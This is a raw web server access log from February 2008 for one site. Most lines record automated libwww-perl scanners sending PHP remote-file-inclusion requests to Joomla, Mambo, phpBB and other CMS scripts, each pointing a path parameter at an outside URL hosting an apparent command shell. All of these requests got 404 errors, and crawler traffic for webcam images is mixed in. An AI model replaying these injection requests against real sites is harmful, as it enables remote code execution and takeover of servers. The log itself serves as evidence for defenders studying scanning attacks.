218.50.53.151 - - [26/Feb/2008:06:48:54 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:49:01 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:49:02 -0800] "GET /retreat1/webcam/retreat1_00073.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:49:02 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:49:03 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:49:03 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:49:16 -0800] "GET /logs/access_080106.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:49:20 -0800] "GET /retreat1/webcam/retreat1_00859.jpg HTTP/1.0" 200 28124 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:06:49:22 -0800] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:06:49:22 -0800] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:06:49:23 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:49:36 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:49:37 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:49:38 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:49:40 -0800] "GET /retreat1/webcam/retreat1_00041.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:06:49:52 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [26/Feb/2008:06:50:02 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:50:16 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:50:44 -0800] "GET /retreat1/webcam/retreat1_00656.jpg HTTP/1.0" 200 33291 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:51:05 -0800] "GET /logs/access_071220.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:51:43 -0800] "GET /logs/access_080120.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.8.125 - - [26/Feb/2008:06:51:49 -0800] "GET /?N=A HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:51:59 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:06:52:03 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:52:04 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:52:20 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.27.49 - - [26/Feb/2008:06:52:38 -0800] "GET /logs/access_080225.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:52:45 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:52:46 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:52:47 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:52:51 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:52:51 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:52:51 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:52:52 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:53:09 -0800] "GET /retreat1/webcam/retreat1_00869.jpg HTTP/1.0" 200 16863 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:53:18 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:53:29 -0800] "GET /retreat1/webcam/retreat1_00542.jpg HTTP/1.0" 200 51569 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:53:50 -0800] "GET /retreat1/webcam/retreat1_00413.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:53:58 -0800] "GET /logs/access_080103.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:53:58 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:54:00 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:54:08 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:54:11 -0800] "GET /retreat1/webcam/retreat1_00353.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:54:20 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:54:20 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:54:33 -0800] "GET /retreat1/webcam/retreat1_00705.jpg HTTP/1.0" 200 50363 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:54:51 -0800] "GET /retreat1/webcam/retreat1_00666.jpg HTTP/1.0" 200 43314 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:56:17 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.23.210 - - [26/Feb/2008:06:57:10 -0800] "GET /logs/access_080125.log HTTP/1.0" 200 674746 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:57:12 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:59:03 -0800] "GET /logs/access.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:59:04 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:59:04 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:59:11 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:59:11 -0800] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:59:11 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.120.255.114 - - [26/Feb/2008:06:59:46 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/aroganz1/tools/safeoff.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.120.255.114 - - [26/Feb/2008:06:59:46 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/aroganz1/tools/safeoff.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:06:59:52 -0800] "GET //components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:06:59:52 -0800] "GET /logs//components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.30.179.209 - - [26/Feb/2008:07:00:58 -0800] "GET /bikes/dteel/?S=A HTTP/1.0" 200 9501 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:07:00:59 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:07:00:59 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:01:27 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:01:27 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:01:28 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:07:01:42 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:07:01:42 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:07:01:42 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:01:55 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:01:56 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:01:56 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:03:16 -0800] "GET /retreat1/webcam/retreat1_00563.jpg HTTP/1.0" 200 47642 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:03:34 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:03:35 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:03:36 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:03:39 -0800] "GET /retreat1/webcam/retreat1_00172.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:03:52 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:03:52 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:03:53 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:04:12 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:04:45 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:04:46 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [26/Feb/2008:07:04:46 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:05:03 -0800] "GET /retreat1/webcam/retreat1_00332.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
203.186.158.77 - - [26/Feb/2008:07:05:08 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://rafb.net/p/6zKkS734.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:07:05:09 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:07:05:10 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:07:05:11 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.186.158.77 - - [26/Feb/2008:07:05:29 -0800] "GET //administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://rafb.net/p/6zKkS734.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:07:05:30 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:07:05:30 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:07:05:30 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:05:41 -0800] "GET /retreat1/webcam/retreat1_00933.jpg HTTP/1.0" 200 17003 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:05:43 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:05:43 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:05:43 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.186.158.77 - - [26/Feb/2008:07:05:54 -0800] "GET /logs//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://rafb.net/p/6zKkS734.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:06:03 -0800] "GET /retreat1/webcam/retreat1_00293.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:07:06:24 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:07:04 -0800] "GET /retreat1/webcam/retreat1_00312.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:07:26 -0800] "GET /retreat1/webcam/retreat1_00907.jpg HTTP/1.0" 200 17189 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:07:07:49 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:07:07:50 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:07:07:51 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:07:08:27 -0800] "GET /retreat1/webcam/retreat1_00644.jpg HTTP/1.0" 200 15134 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
